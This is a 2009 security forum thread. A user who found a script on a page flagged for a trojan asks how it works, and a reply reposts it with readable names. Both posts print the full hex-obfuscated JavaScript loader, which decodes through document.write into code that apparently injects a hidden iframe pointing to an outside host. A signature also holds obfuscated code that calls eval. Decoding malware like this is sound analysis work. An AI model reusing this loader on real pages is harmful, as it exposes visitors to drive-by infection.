I've stumbled upon a website and when the page was loading my antivirus found a trojan. I've managed somehow to view the page contents and I've stumbled upon this script and tried to understand how it's working but the messy functions and var names got my head spinning so here it it maybe someone here can tell what this all about.

<script>function c268fb268di4a006283449b4(i4a00628344d43){ return (parseInt(i4a00628344d43,16));}function i4a006283458f6(i4a00628345ce2){ var i4a006283460ac='';i4a0062834704f=String.fromCharCode;for(i4a006283464ab=0;i4a006283464ab<i4a00628345ce2.length;i4a006283464ab+=2){ i4a006283460ac+=(i4a0062834704f(c268fb268di4a006283449b4(i4a00628345ce2.substr(i4a006283464ab,2))));}return i4a006283460ac;} var r28='';var i4a0062834744f='3C7'+r28+'3637'+r28+'2697'+r28+'07'+r28+'43E696628216D7'+r28+'96961297'+r28+'B646F637'+r28+'56D656E7'+r28+'42E7'+r28+'7'+r28+'7'+r28+'2697'+r28+'465287'+r28+'56E657'+r28+'363617'+r28+'065282027'+r28+'2533632536392536362537'+r28+'322536312536642536352532302536652536312536642536352533642536332533322533362532302537'+r28+'332537'+r28+'32253633253364253237'+r28+'2536382537'+r28+'342537'+r28+'342537'+r28+'302533612532662532662536312536652537'+r28+'342536392537'+r28+'362536392537'+r28+'322537'+r28+'352537'+r28+'332532652537'+r28+'36253633253266253366253237'+r28+'2532622534642536312537'+r28+'342536382532652537'+r28+'322536662537'+r28+'352536652536342532382534642536312537'+r28+'342536382532652537'+r28+'32253631253665253634253666253664253238253239253261253336253333253331253336253338253239253262253237'+r28+'253339253339253335253237'+r28+'2532302537'+r28+'37'+r28+'2536392536342537'+r28+'34253638253364253333253337'+r28+'253336253230253638253635253639253637'+r28+'2536382537'+r28+'342533642533312533362533382532302537'+r28+'332537'+r28+'342537'+r28+'39253663253635253364253237'+r28+'2537'+r28+'362536392537'+r28+'332536392536322536392536632536392537'+r28+'342537'+r28+'39253361253638253639253634253634253635253665253237'+r28+'2533652533632532662536392536362537'+r28+'3225363125366425363525336527'+r28+'29293B7'+r28+'D7'+r28+'6617'+r28+'2206D7'+r28+'969613D7'+r28+'47'+r28+'27'+r28+'5653B3C2F7'+r28+'3637'+r28+'2697'+r28+'07'+r28+'43E';document.write(i4a006283458f6(i4a0062834744f));</script>

<script>
function fromHex(str) {
return parseInt(str, 16);
}


function extractPayload(payload) {
var decoded = "";
for (var i = 0; i < payload.length; i += 2) {
decoded += String.fromCharCode(fromHex(payload.substr(i, 2)));
}
return decoded;
}

var r28 = "";
var payload = "3C7" + r28 + "3637" + r28 + "2697" + r28 + "07" + r28 + "43E696628216D7" + r28 + "96961297" + r28 + "B646F637" + r28 + "56D656E7" + r28 + "42E7" + r28 + "7" + r28 + "7" + r28 + "2697" + r28 + "465287" + r28 + "56E657" + r28 + "363617" + r28 + "065282027" + r28 + "2533632536392536362537" + r28 + "322536312536642536352532302536652536312536642536352533642536332533322533362532302537" + r28 + "332537" + r28 + "32253633253364253237" + r28 + "2536382537" + r28 + "342537" + r28 + "342537" + r28 + "302533612532662532662536312536652537" + r28 + "342536392537" + r28 + "362536392537" + r28 + "322537" + r28 + "352537" + r28 + "332532652537" + r28 + "36253633253266253366253237" + r28 + "2532622534642536312537" + r28 + "342536382532652537" + r28 + "322536662537" + r28 + "352536652536342532382534642536312537" + r28 + "342536382532652537" + r28 + "32253631253665253634253666253664253238253239253261253336253333253331253336253338253239253262253237" + r28 + "253339253339253335253237" + r28 + "2532302537" + r28 + "37" + r28 + "2536392536342537" + r28 + "34253638253364253333253337" + r28 + "253336253230253638253635253639253637" + r28 + "2536382537" + r28 + "342533642533312533362533382532302537" + r28 + "332537" + r28 + "342537" + r28 + "39253663253635253364253237" + r28 + "2537" + r28 + "362536392537" + r28 + "332536392536322536392536632536392537" + r28 + "342537" + r28 + "39253361253638253639253634253634253635253665253237" + r28 + "2533652533632532662536392536362537" + r28 + "3225363125366425363525336527" + r28 + "29293B7" + r28 + "D7" + r28 + "6617" + r28 + "2206D7" + r28 + "969613D7" + r28 + "47" + r28 + "27" + r28 + "5653B3C2F7" + r28 + "3637" + r28 + "2697" + r28 + "07" + r28 + "43E";
document.write(extractPayload(payload));
</script>

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

And so the question is can Hackvertor decode it? :)

[www.businessinfo.co.uk]

and if you're super lazy:-
[www.businessinfo.co.uk]

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]



Edited 1 time(s). Last edit at 05/08/2009 05:34AM by Gareth Heyes.